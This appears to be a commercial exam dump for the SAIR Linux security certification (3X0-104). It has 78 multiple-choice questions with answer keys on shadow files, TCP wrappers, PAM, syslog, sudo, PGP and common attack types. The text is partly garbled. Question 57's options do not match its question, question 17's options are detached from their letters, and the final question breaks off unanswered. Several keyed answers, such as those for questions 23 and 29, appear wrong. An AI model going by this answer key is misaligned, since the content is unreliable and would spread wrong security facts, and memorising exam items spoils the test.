Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Question: 1
Kathryn wants to maximize security on her system by replacing ftpd with a program that logs
requests, denies unauthorized users, and runs the original ftpd daemon. What should Kathryn
use?
A. TCP wrappers
B. A VPN
C. Tripwire
D. Packet filters
Answer: A
Question: 2
John has just set up shadowing on his Linux machine. As root, he looks in the /etc/shadow file
and finds the line below. Which of the following is TRUE about the line he found?
jsmith:H7o12v$s:100:0:60:7:3::
A. The user jsmith's account has been disabled for 100 minutes.
B. The user jsmith's password can only be changed after the current password has been active
for 3 days.
C. The user jsmith will be warned for 60 days until his password expires.
D. The user jsmith's account will be disabled 3 days after his password expires.
Answer: D
Question: 3
John would like the finger daemon to be TCP wrapped. He finds the line below in the
/etc/inetd.conf file. How should he change this line to enable wrapping of the finger daemon?
finger stream tcp nowait nobody /usr/sbin/in.fingerd
A. finger stream tcpd nowait /usr/sbin/in.fingerd
B. finger stream tcp nowait /usr/sbin/tcpd in.fingerd
C. finger stream tcpd nowait /usr/sbin/tcpd finger
D. finger stream tcp nowait /usr/sbin/in.fingerd in.fingerd
Answer: B
Question: 4
Which of the following can be used to watch logged-in users as they execute commands?
A. ttysnoop
B. mgetty
C. sniffdev
D. urlsniff
Answer: A
Question: 5
Which of the following best describes how the Crack program breaks passwords?
A. It gathers passwords by masquerading as a Kerberalized login program.
B. It encrypts a list of dictionary words and compares it to passwords already encrypted on the
system.
C. It attempts to decrypt passwords that are already encrypted on the system.
Page 1 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D. It gathers plain-text information sent over the network and parses that information for
passwords.
Answer: B
Question: 6
The following is a listing from the /etc/passwd file. Which users have a user identification (UID) of
superuser?
johndoe:x:1:0::/home/johndoe:/bin/bash
tom:x:0:0::/home/tom:/bin/bash
beth:x:0:1::/home/beth:/bin/bash
carla:x:1:1::/home/carla:/bin/bash
A. johndoe and carla
B. tom and beth
C. johndoe and tom
D. beth and carla
Answer: B
Question: 7
Charles has been using PGP for file encryption for months and wants to expand its uses to other
projects. Which of the following would NOT be an effective use of PGP?
A. Creating public keys for user authentication
B. Encrypting company e-mail
C. Creating digital signatures
D. Encrypting the signing of SSL certificates
E. Creating private keys for user authentication
Answer: D
Question: 8
Molly wants to encrypt and send an e-mail containing sensitive material to Sandy. To ensure that
no one besides Sandy can read the e-mail, Molly wants to use PGP encryption. Which of the
following methods will allow Molly to encrypt the e-mail and provide a way for Sandy to decrypt it?
(Choose two.)
A. Molly gives a password at encryption time that Sandy can use to decrypt the e-mail.
B. Molly encrypts the e-mail using a private key. Sandy must then decrypt it using the public
key.
C. Molly encrypts the e-mail using a public key. Sandy must then decrypt it using the private
key.
D. Molly encrypts the e-mail using a series of private keys. Sandy then decrypts it using one of
the private keys sent along with the e-mail.
Answer: A, C
Question: 9
A cracker has obtained the /etc/passwd file from a large Server . In an attempt to gain entry
into the system, the cracker checks the encrypted passwords from /etc/passwd against a list of
encrypted passwords created from a word list. This is an example of a ________ attack.
A. dictionary
Page 2 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
B. buffer overflow
C. brute force
D. smurf
E. spoof
Answer: A
Question: 10
An assistant network administrator has just been assigned the task of enhancing network
security. One of the options that he has to implement is password aging. Consider the excerpt
below from the /etc/passwd file. Which two commands can the network administrator run to make
jdoe's and msmith's passwords expire in 90 days? (Choose two.)
A. passwd -90 jdoe msmith
B. passwd -x 90 jdoe msmith
C. passwd --expire 90 jdoe msmith
D. crypt -m 90 jdoe msmith
E. chage -m 90 jdoe msmith
Answer: B, E
Question: 11
An assistant network administrator has just been assigned the task of enhancing network
security. One of the options to be implemented is password aging. Consider the excerpt from the
/etc/passwd file below. Which of the following would implement password aging?
A. shadow -x 90 jdoe msmith
B. pwconv; passwd -x 90 jdoe msmith
C. crypt; passwd -age 90 jdoe msmith
D. pwage -t 90 jdoe msmith
Answer: B
Question: 12
Tom, a system administrator for Server A, is interested in security and has written a script that
scans the password file for unauthorized promotion to root status. Which of the following should
the script check? (Choose two.)
A. A UID number that has been set to one
B. A UID number that has been set to zero
C. An account with the GID set to *
D. A user with a non-standard shell (i.e., "/bin/runasroot")
E. An account with the UID set to *
Answer: B, D
Question: 13
The line below is from an /etc/passwd file. What information does the presence of a single
character in the second field (an x in most cases) reveal about the password authentication
procedure?
john:x:500:100::/home/john:/bin/bash
A. Encoded passwords are stored in "/etc/shadow."
B. The administrator has locked this user's account.
C. The user's encrypted password is x.
Page 3 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D. The user's password hasn't been assigned.
Answer: A
Question: 14
A team's project leader, Joe, needs read and write permissions to all files created in the directory
/home/group1/shared, regardless of file ownership. Joe owns this directory. Which of the
following commands will set these permissions? The pwd is
/home/group1/shared. Assume Joe does not have root access.
A. setfacl -m d:u:joe:rwx *
B. chmod 777 *
C. umask 000 *
D. chown -D joe *
E. setuid -r joe *
Answer: A
Question: 15
Which file must be modified to set the default values for such items as password expiration and
super user PATH settings?
A. /etc/permissions
B. /etc/login.defs
C. /etc/smb.conf
D. /etc/defaults
Answer: B
Question: 16
Which of the following protocols transmit encrypted ASCII text by default?
A. POP
B. IMAP
C. FTP
D. Telnet
E. https
Answer: E
Question: 17
Tom is a developer in a Linux system. Due to the carelessness of the system administrator, he
obtains the superuser password. Tom decides to write a setuid program that would make him the
superuser even without the password, but he means no harm
to the company. He places the program in the /sbin directory. He also makes sure to touch the
program so that it has the same date as various other programs in that directory. Which of the
following are the most appropriate methods for the system administrator to detect the program?
(Choose two.)
A.
B.
C.
D.
E.
Execute the find command to display program names with the setuid bit set.
Use a software package such as tripwire to detect changes in the directory structure.
Run a script that performs a "chmod -s" on all binaries in order to turn off setuid.
Check the /var/sulog file, as it contains entries that describe programs with the setuid bit set.
Execute the locate command with the subexecution of the stat command to determine the
true creation date of each file
Page 4 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Answer: A, B
Question: 18
A large company has a network of computers in New York and a separate network in London.
The company president needs the two networks to act as one, but he does not want to lease an
expensive line between the two. Which of the following can the
company use to provide secure traffic between the two networks using the Internet?
A. VPN
B. LAN
C. TCP wrappers
D. WAN
E. Dual-homed host
Answer: A
Question: 19
William, a network administrator for a small marketing firm, wants to provide maximum security
for sensitive information on his network. To do this, he has decided to set up a closed path for
data transmission between two points on the network.
Which of the following network concepts is this an example of?
A. Ethernet bridge
B. TCP wrappers
C. Proxy Server
D. Tunneling
E. Encrypted sticky packets
Answer: D
Question: 20
Jim, who has recently been promoted to network administrator, wants to specify rules for routing.
However, he is unsure about how router packet filters parse and apply rules. Which of the
following are TRUE regarding router packet filtering? (Choose two.)
A. Rules are checked against packets by parsing the body of the packet for information in a way
similar to the method the grep program uses to parse text files.
B. The packet headers are parsed and tested against the routing rules.
C. Packet filtering rules can be applied to inbound and outbound network interfaces.
D. Router packet filters remove headers from packets and apply rules based on the content of
the packet.
Answer: B, C
Question: 21
An administrator has implemented a chain of router packet filtering rules on a major system
Server . A user has sent a packet to the network protected by the packet filter. The packet
originated from 190.15.65.0/24 and is destined for 212.220.0.0/16. Considering the chain of
packet filtering rules below, what will happen to the packet and why?
rule source destination action
A 190.15.60.0/24 212.220.0.0/16 deny
B 212.220.0.0/16 190.15.65.0/24 deny
C 190.15.0.0/16 212.220.0.0/16 permit
Page 5 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D 0.0.0.0/0 0.0.0.0/0 deny
A. The packet will be permitted because no rules apply.
B. The packet will be permitted because it matches rule C.
C. The packet will be denied because all sources and destinations are blocked by rule D.
D. The packet will be denied because the packet matches rule A.
Answer: B
Question: 22
The system administrator wants to log all of the kernel messages (e.g. kernel panics) to a file
instead of having the messages go to the console (e.g. /dev/console). Which file should she edit,
and what line in the file should she add, to perform this duty?
A. /etc/klog.conf; kern.* /var/log/kernel.log
B. /etc/logd; kernel.* /var/log/kernel.log
C. /etc/syslog.conf; *.notice /var/log/kernel.log
D. /etc/syslog.conf; kern.* /var/log/kernel.log
E. /etc/klog.conf; *.notice /var/log/kernel.log
Answer: D
Question: 23
An administrator believes that an unauthorized user has been attempting to connect to a system
Server . Where could the administrator look to find logs of connection attempts and the origins of
those connections?
A. /var/log/secure
B. /var/adm/sulog
C. /var/log/logins
D. /var/adm/connect
Answer: B
Question: 24
A large Server has many services running, including FTP, NFS, and NIS. It is hard for the
administrator to find security holes in the services' configuration files, and this leads to possible
security risks. Which of the following tools could the administrator use to check these services for
security holes?
A. NTOP
B. LogCheck
C. SAINT
D. Tripwire
Answer: C
Question: 25
On Monday, a system administrator for a Linux software company noticed more than 100 failed
Telnet login attempts to the same user from the IP address 25.25.25.25 on the same day. Which
action could he take to protect the user account and the system? (Choose two.)
A. Restart the computer to reset the TCP wrapper daemon.
B. Disable the account to prevent password guessing.
C. Reconfigure the /etc/hosts.deny file to block all access from this IP address.
Page 6 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D. Start a log of all failed passwords that are being used to review the type of passwords that
are being guessed.
Answer: B, C
Question: 26
Which file contains configuration information for the logging daemon, specifies a pattern of
facilities to be logged, a logging priority, and where the logs are stored?
A. /etc/inittab
B. /etc/inetd.conf
C. /etc/syslog.conf
D. /etc/sysconfig/log.conf
E. /etc/modules.conf
Answer: C
Question: 27
Which of the following describes the contents of the /var/log/btmp log file?
A. It stores only the users' real names and their login times.
B. It contains a list of failed login attempts in a format similar to the wtmp log file.
C. It contains all successful superuser login attempts.
D. It contains a list of all users currently logged in to the system, along with their IP addresses.
Answer: B
Question: 28
An assistant network administrator has just been assigned the task of enhancing network
security. Some of his ideas had involved a daily check of the system. A script that has been
created will be executed daily as a cron job. Which of the following "find" commands might be
included in this script? (Choose two.)
A. find / -perm +4000 >> /var/log/daily
B. find / -mtime 1 >> /var/log/daily
C. find / -exec md5sum -c {} \; >> /var/log/daily
D. find / -name * >> /var/log/daily
E. find / -type s >> /var/log/daily
Answer: A, B
Question: 29
An administrator finds a program on a network Server that modifies several system service
records when a certain user logs in and out. The program masks the intruder's actions. This is
most likely an example of what type of a _________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: D
Question: 30
Page 7 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
An administrator finds that the Telnet daemon is listening on two ports. Any user who connects to
the non-standard port will be granted immediate access. This is an example of a __________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: C
Question: 31
An administrator finds a program on a network Server that has used Send mail to propagate
itself by sending copies of the program to many remote Server s. Though the program itself does
not contain malicious code, it has caused the Server to slow
down because it has consumed large amounts of network and processor resources. This is most
likely an example of a __________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: B
Question: 32
A malicious user has sent thousands of TCP connection requests to a Server from various
forged IPs. The Server does not receive acknowledgments from any of the requesting clients
because they do not exist. The massive strain on the Server causes
it to crash. This is an example of what type of Denial of Service (DoS) attack?
A. SYN flood
B. ICMP flood
C. Smurf attack
D. Buffer overflow
Answer: A
Question: 33
A malicious user has spoofed his IP address, making it appear that he is using another machine,
called machine 2. The user now broadcasts a forged ping request out to an entire network of
machines. Machine 2 is hit with a large number of pings at
one time, resetting its connection. This is most likely an example of what type of Denial of Service
(DoS) attack?
A. SYN flood
B. Buffer overflow
C. Smurf attack
D. Logic bomb
Answer: C
Question: 34
Michael, a software developer at a reputable computer firm, has written a program that will
damage the firm's computer systems if he is fired. Once the program is installed, it will be totally
Page 8 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
inactive unless Michael's account is removed from the system or is inactive for more than 14
days. Which of the following describes the type of software that Michael has created?
A. Trojan horse
B. Worm
C. Back door
D. Logic Bomb
Answer: D
Question: 35
Macro Comm Inc., a new wireless communications company, has decided to use Linux as its
operating system. The system administrators have taken many precautions to ensure that the
Server s are secure. Which of the following can pose a threat to
the system's security? Assume all employees have physical access to the Server .
A. The Server 's case is padlocked, but a floppy drive and CD-ROM are accessible on the
machine.
B. There are no floppy drives or CD-ROM drives on the Server , but the case is not locked.
C. The case is not locked, but there is a BIOS password to ensure that the floppy, CD-ROM,
and network cannot be booted.
D. The Server 's case is unlocked, and the floppy drive is the first boot option in the BIOS.
E. All of the above
Answer: E
Question: 36
Tom is a system administrator for Linux Server A . Tom is running a Perl script that will initiate a
connection request from Server A to Server B without completing the network connection. This is
done multiple times until Server B can no longer
communicate on the network. What kind of attack has Tom initiated?
A. Spam blast
B. TCP bomb
C. Denial of Service
D. Internet Worm
Answer: C
Question: 37
Before Linux site sets up its Network, it develops its Network Policy. Which of the following is
NOT a reason why Linux site should have a Network Policy set up?
A. It will inform the users of the appropriate use of the system.
B. It will provide Linux site with liability protection if illegal activities are performed on their site
without their knowledge.
C. It will block unauthorized users from accessing the network.
D. It will provide Linux site with a standard way to deal with problems concerning the Network.
Answer: C
Question: 38
The system administrator needs to set the existing user jsmith's home directory to
/mnt/home/jsmith. Which of the following commands can she use to do this?
Page 9 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A. useradd
B. setenv
C. vigr
D. usermod
Answer: D
Question: 39
A cracker has been trying to get into a system's password file so she can use a program to
decrypt the passwords that are stored there. The system that she is trying to crack has
shadowing enabled. How will this help prevent the cracker from cracking the root password?
A. Shadowing stores encrypted passwords in the /etc/shadow file, which only root can access.
B. Shadowing encrypts passwords that have already been encrypted, making them harder to
crack.
C. Shadowing encrypts passwords and stores a public key in the /etc/shadow file. Only users
with the private key can access these passwords.
D. Shadowing changes permissions on the /etc/passwd file so that only root can read it.
Answer: A
Question: 40
The system administrator has just been notified that the user btomlin will not be accessing the
local network by any means for the next six months because he will be out of town. How can the
system administrator disable btomlin's account without deleting it? (Assume that shadow
passwords are used.)
A. Remove the encrypted password from the /etc/shadow file.
B. Remove the shell field from btomlin's /etc/passwd file entry.
C. Issue the command "chmod 000 /home/btomlin."
D. Place an asterisk (*) in front of the encrypted password in the /etc/shadow file.
Answer: D
Question: 41
Jim is using pam.conf to configure his pluggable authentication modules (PAM). He has many
services that use authentication and is having trouble maintaining the pam.conf file. What can Jim
do to make the administration of PAM easier?
A. Use multiple pam.conf files to manage authentication.
B. Use the pam.d directory structure, which uses multiple configuration files named for the
services they configure.
C. Instead of using PAM, configure each service for its own authentication.
D. Use the /etc/pam.d/other file to authenticate, using the pam_deny.so module.
Answer: B
Question: 42
John has accidentally deleted his pam.d directory and does not have a pam.conf file on his
machine. Because there is no configuration for authentication, all attempts to log in will fail. John
boots in single user mode and creates the /etc/pam.d/other file shown below. What effect will
these lines have on the system?
auth required /lib/security/pam_permit.so
account required /lib/security/pam_permit.so
Page 10 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
password required /lib/security/pam_permit.so
session required /lib/security/pam_permit.so
A. This will allow all users except auth, account, password, and session to log in without a
password.
B. This will allow only the users auth, account, password, and session to log in without a
password.
C. This will allow all users except root to log in without a password.
D. This will allow all users to log in without a password.
Answer: D
Question: 43
Elvis is looking in the /etc/securetty file and finds the lines below. What do these lines indicate?
tty1
tty2
tty3
tty4
A. Root can only log in to the first four virtual terminals.
B. Only the first four virtual terminals will be secure.
C. Only the first four virtual terminals will be open.
D. Root cannot log in to the first four virtual terminals.
E. Remote connections to the first four virtual terminals will be encrypted.
Answer: A
Question: 44
Billy needs to prevent the user gmogley from using the FTP service. Billy creates the file
/etc/ftpusers. How must he edit the /etc/pam.d/ftp file to prevent gmogley from using FTP?
A. Add the line: auth required /lib/security/pam_listfile.so\ onerr=fail item=user sense=succeed
file=/etc/passwd
B. Add the line: auth sufficient /lib/security/pam_secureftp.so \ onerr=fail item=user sense=deny
file=/etc/ftpusers
C. Add the line: auth required /lib/security/pam_listfile.so \ onerr=succeed item=user
sense=deny file=/etc/ftpusers
D. Add the line: auth sufficient /lib/security/pam_secureftp.so \ onerr=succeed item=user
sense=deny file=/etc/passwd
Answer: C
Question: 45
Sheila wants her machine to check her account for new mail each time she logs in. Which PAM
configuration file should she edit, and which line should she add to this file to achieve this?
A. /etc/pam.d/login auth optional pam_checkmail.so
B. etc/pam.d/rlogin auth optional pam_mail.so
C. /etc/pam.d/rlogin auth optional pam_checkmail.so
D. /etc/pam.d/login auth optional pam_mail.so
Answer: D
Question: 46
Page 11 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Jerry has just finished editing the /etc/syslog.conf file to send all system messages to tty12 by
adding the line "*.* /dev/tty12". After saving the file and closing his editor he switches to tty12 but
sees no messages. What is the reason for this?
A. Jerry has put the syslog.conf file in the wrong place.
B. The syslogd must be restarted before it will read any changes made in the syslog.conf file.
C. The line added should read "*.* @tty12".
D. The line added should read "ALL /dev/tty12".
Answer: B
Question: 47
Omar would like all private authentication messages to be logged to a remote machine named
log.linuxsite.org. Which of the following lines, when added to the syslog.conf file, will achieve
this?
A. authpriv.* @log.linuxsite.org
B. *.authpriv @log.linuxsite.org
C. authpriv.* log.linuxsite.org
D. *.authpriv log.linuxsite.org
Answer: A
Question: 48
syslogdcan be used to log messages based on the message priority. Which of the following is
NOT a valid priority that can be set in the syslogd configuration file?
A. warning
B. debug
C. err
D. system
E. info
Answer: D
Question: 49
Given the code below from an /etc/syslog.conf file, which of the following lines is invalid?
1 kern.* /dev/console
2 *.emerg;local3.none *
3 *.mail |/var/log/maillog
4 authpriv.* @log.somedomain.com
5 local7.* /var/log/boot.log
A. 1
B. 2
C. 3
D. 4
E. 5
Answer: C
Question: 50
Page 12 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A system administrator wants to log all error level kernel messages to the remote system
"loghost.somedomain.com". In order to do this, which of the following lines should be added to
/etc/syslog.conf?
A. err.kern loghost.somedomain.com
B. err.kern | mail [email protected]
C. err.kern REMOTE loghost.somedomain.com
D. kern.err @loghost.somedomain.com
E. kern.err | mail [email protected]
Answer: D
Question: 51
syslogdcan write a logfile directly to all of the following destinations except a _______.
A. named pipe
B. virtual terminal
C. remote host
D. compressed file
E. file
Answer: D
Question: 52
Why would a system administrator want to use the Sudo program in a workplace where many
changes need to be made with root privileges?
A. Using Sudo will keep track of all the changes that are made by root, making it easier for the
administrator to go back and fix mistakes.
B. Using Sudo will allow non-root users specified in its configuration file to run certain programs
as root.
C. Sudo allows specified programs to run as root at certain time intervals
D. Sudo logs all attempted switch user (su) attempts.
Answer: B
Question: 53
Which of the following is NOT a function of TCP Wrapper?
A. It prevents unauthorized hosts from accessing network services on a system.
B. It allows authorized hosts to access network services on a system.
C. It secures all network services listed in /etc/services.
D. It listens for incoming connections to services listed in inetd.conf that specify tcpd.
Answer: C
Question: 54
The lines below are in the /etc/hosts.allow file for linuxsite.org. Which of the following is TRUE?
(Assume the hosts.deny file contains the line ALL:ALL.)
#hosts.allow
telnetd:.linuxsite.org EXCEPT log.linuxsite.org
ftpd: web.linuxsite.org
ALL:LOCAL
Page 13 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A. All hosts at linuxsite.org can use the telnetd service.
B. log.linuxsite.org cannot use the ftpd service.
C. web.linuxsite.org cannot use the telnetd service.
D. Only web.linuxsite.org can use the ftpd service.
Answer: D
Question: 55
Two of the TCP wrapper files are /etc/hosts.allow and /etc/hosts.deny. Which of the following best
describes how authentication is performed using TCP wrappers?
A. The rules in /etc/hosts.deny are checked first. If a connection matches any of the rules, it is
denied.
B. The rules in /etc/hosts.allow are checked first. If a connection matches any of the rules, then
it is allowed.
C. The rules in /etc/hosts.deny are checked first. If a connection matches any of the rules, then it
is denied unless it matches a rule in /etc/hosts.allow.
D. The rules in /etc/hosts.allow are checked first. If a connection matches any of the rules, then
it is allowed unless it matches a rule in /etc/hosts.deny.
Answer: B
Question: 56
Which rule may be added to the /etc/hosts.deny file in order to deny all requests for inetd initiated
services on a system?
Assume /etc/hosts.allow is empty.
A. ALL: ALL
B. INETD:ALL
C. DENY: ALL
D. DENY: 0.0.0.0/255.255.255.255
Answer: A
Question: 57
Assume that the hosts.allow file is set to "ALL: .linuxsite.org" and the hosts.deny file is "ALL:ALL".
If Server .linuxsite.org initiates an FTP transfer using TCP wrappers, what will be the initial
response of the Server ?
A. Edit /etc/inittab so the system always boots to runlevel 5.
B. Disable inetd in the startup scripts.
C. Delete the /etc/passwd file.
D. Enable only services that are needed and disable all unnecessary services.
Answer: D
Question: 58
Jerry is setting up a firewall for a Local Area Network (LAN), and he wishes to use the firewall as
the default gateway for the LAN. In order to do this, which of the following MUST Jerry do to the
packets coming from the LAN to the firewall?
A. Forward
B. Sniff
C. Deny
Page 14 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D. Mangle
E. Encapsulate
Answer: A
Question: 59
Arnold wants to check the integrity on certain files on his Linux system. Which of the following
commands can Arnold use to display the checksum and blocksize of a specified file?
A. md5sum
B. stat
C. file
D. sum
E. cksum
Answer: D
Question: 60
Tom created checksums on five files in his home directory (file1, file2, file3, file4, file5). The
contents of this file (checksums.txt) are shown below. Which of the following is TRUE concerning
this scenario?
134a1f6f730855f9ed52748433d5672e file1
4512fbedda42a2fbbee52309d6e3142d file2
728ea00889f16f26da54b0f40adc54e0 file3
6ebd7fe47b6659d0cd0e2c874fd5e862 file4
79182eaf49fa9c76e193aa2bac277bc9 file5
A. The five files in Tom's home directory must be plain text because checksums cannot be
performed on binary files.
B. The command md5sum file* > checksums.txt is a valid way to create checksums.txt.
C. The file checksums.txt contains 64 bit checksums.
D. The integrity of these files can be checked by issuing the command cksum -c checksums.txt.
Answer: B
Question: 61
A user on a Linux box needs to scan the machine for open TCP ports. Assuming the user does
not have root access, which of the following nmap options should she use to do this?
A. nmap -sT localhost
B. nmap -sF localhost
C. nmap -sA localhost
D. nmap -sU localhost
E. nmap -sS localhost
Answer: A
Question: 62
Dexter wants to secure his workstation, but he does not want to log out. Which of the following
utilities will allow him to do this? (Choose two.)
A. xlock
B. vlock
C. screen
Page 15 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
D. mouselock
E. klub
Answer: A, B
Question: 63
Fred issues the command "gpg --list-keys" and receives the output below. Fred wants to publish a
text version of his public key. Which of the following commands will accomplish his task?
/home/fred/.gnupg/pubring.gpg
---------------------------------pub 1024D/94E5A9AB 2001-08-14 Fred Smith (none)
sub 1024g/3AB100B5 2001-08-14
A. gpg --export [email protected] --armor fredspk > fredspk
B. gpg --output fredspk.gpg --symmetric fredspk --export [email protected]
C. gpg --output fredspk --export [email protected]
D. gpg --armor --export [email protected] > fredspk
Answer: D
Question: 64
Mary and Jack are both using public-key cryptography. Jack wants to send a private text
message to Mary. He encrypts the message using Mary's public key. Mary opens the file and
sees the text below. Mary will decrypt this message using _______.
-----BEGIN PGP MESSAGE----Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
hQEOAxLusc0kJ4fdEAP/ToJI4G3wm72BhKFTGm20cjw4/bRsIe1UPslHphhZ0u6t
MP7Oofpz3OS02KrR8gmypHnu1t9suaXPvzF4skwy1BEf/LfsQh20/f9h5NRMcjRP
x19CVaTaKN2IFzBcScQXF9Mw0Js4j+r2Jxkig/rMQMFjK0+nGmXOIf+9fNnxodUD
+gOdM6tZbQeGJwvqzuCT5i2xKX7TiVEJ4HfXS5u5vZCXZBMa20yAGKupfYEmRc4f
OyKFJ33IE/LMi6HRakrg5egkYbSdNeodMHLv5HcrwiBhTtNjH4LgUFpEB6IMFKs1
2dv9qeMhsx2W8wljlZJc81M3jMEQvmXQJ81JrcCnC5KPySrViT+Fq8L98XrLIAnm
ydWRWSkJ/u2nW9F2D8MFZIR7DHcuhf8i8KIY02I=
=+xA9
-----END PGP MESSAGE----A. Jack's public key
B. Jack's private key
C. her public key
D. her private key
Answer: D
Question: 65
Aristotle, a system administrator, is curious about some of the traffic coming through his proxy
Server . Which of the following utilities can Aristotle use to show packet headers and contents
transmitted to and from "eth0" on his proxy Server ?
A. portmap
B. sniffit
C. urlsnarf
D. ttysnoop
Page 16 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Answer: B
Question: 66
Antonio wants to sniff incoming and outgoing packets on his network. Which of the following will
allow him to view multiple connections interactively?
A. tcpdump -i
B. ttysnoop -i
C. sniffit -i
D. portmap -i
Answer: C
Question: 67
Consider the output below. Which of the following commands most likely produced this output?
3:40pm up 10 days, 1:27, 16 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jojo31 pts/0 192.168.1.9 12:20pm 47:57 0.21s 0.02s screen -x
jimmy9 pts/1 192.168.5.32 1:19pm 39.00s 18.66s 18.66s vi prog6.c
eegeor pts/2 192.168.89.90 1:20pm 8days 0.19s 0.19s /bin/bash
A. uptime
B. ps aux
C. who
D. w
Answer: D
Question: 68
For security reasons, Julius wants to delete the file that logs failed login attempts. He has deleted
the /var/log/wtmp file, but when "lastb" is run, failed login attempts are still displayed. Which of the
following is most likely the problem?
A. Failed login attempts are not stored in /var/log/wtmp; they are stored in /var/log/messages.
B. lastb makes backups of /var/log/wtmp, so those must be deleted as well.
C. syslogd does not allow these files to be deleted; logs of failed login attempts are required for
syslogd to function properly.
D. Failed login attempts are not stored in /var/log/wtmp; they are stored in /var/log/btmp.
Answer: D
Question: 69
Greg is doing some routine cleaning on his Linux machine and notices a file that he is not familiar
with called /var/log/pacct. It is set so only root can read to or write from the file. Which of the
following commands makes use of this file?
A. last
B. lastb
C. who
D. w
E. lastcomm
Answer: E
Page 17 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Question: 70
Where can a non-root user find information, such as usernames, to break into user accounts?
(Choose two.)
A. /etc/login.defs
B. /etc/passwd
C. /etc/issue
D. /etc/group
E. /etc/shadow
Answer: B, D
Question: 71
The system administrator needs to see the list of users who have logged in and out on their
machines and the times when they did so. Which command searches the /var/log/wtmp file and
displays who has logged on to the machine and the time?
A. who
B. wtmp
C. lastb
D. last
Answer: D
Question: 72
Jerome needs a way to ensure that only certain users can use Sudo. He wants user1, user2, and
user3 to be able to run ls, mkdir, and chown. He has added the lines below to the /etc/sudoers
file. What is wrong with these lines?
Runas_Alias SUDO_ALIAS1 = user1, user2, user3
Cmnd_Alias COMMANDS = /bin/ls,/bin/mkdir,/bin/chown
SUDO_ALIAS1 ALL = COMMANDS
A. The Cmnd_Alias line should read "Cmnd_Alias SUDO_ALIAS1 : user1, user2, user3"
B. The Runas_Alias line should read "User_Alias SUDO_ALIAS1 = user1, user2, user3"
C. The SUDO_ALIAS1 line should read "SUDO_ALIAS ALL : ALL"
D. Nothing is wrong; these lines of code will do exactly what Jerome needs them to do.
Answer: B
Question: 73
User johnny5 attempts to execute the command "sudo /bin/ls" and receives the error, "Sorry, user
johnny5 is not allowed to execute "/bin/ls" as root on machine.work.com." Which of the following
is most likely the problem?
A. johnny5 is not in the "/etc/sudoers" file.
B. johnny5 is in the "/etc/sudoers" file, but he is not authorized to run "/bin/ls" as root.
C. sudo is not installed on machine.work.com
D. johnny5 is not a valid user on this system.
Answer: B
Question: 74
Which of the following best contrasts secure copy (scp) and FTP?
Page 18 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A. Scp provides more security with less overhead.
B. Scp provides more security with more overhead.
C. Scp provides less security with more overhead.
D. Scp provides less security with less overhead.
Answer: B
Question: 75
Stephen wants to run Mozilla from the remote machine system2, which has X-forwarding
enabled. Which of the following commands, run locally, will enable Stephen to run Mozilla on
system2 and forward the X display to his local machine?
A. mozilla --display system2:0
B. export DISPLAY=localhost:0
C. ssh -X system2
D. xhost +localhost
Answer: C
Question: 76
What will the following command do?
$ ssh -l jzero box2 uptime
A. ssh to a machine named 'box2' as user 'jzero' and execute the uptime command
B. ssh to a machine named 'jzero' as user 'box2' and execute the uptime command
C. Create an interactive login session on box2
D. Nothing; the command has a syntax error
Answer: A
Question: 77
Jimmy wants to write a script to securely transfer a number of files from a remote machine to his
current machine. Which of the following does he need to use?
A. scp
B. ftp
C. wget
D. https
Answer: A
Question: 78
Rex, a system administrator, wants to manually add some users to the /etc/passwd file. Which of
the following is considered a safe way to edit this file?
A. vim /etc/passwd
B. pico /etc/passwd
C. passwd
D. vipw
E. pwconv
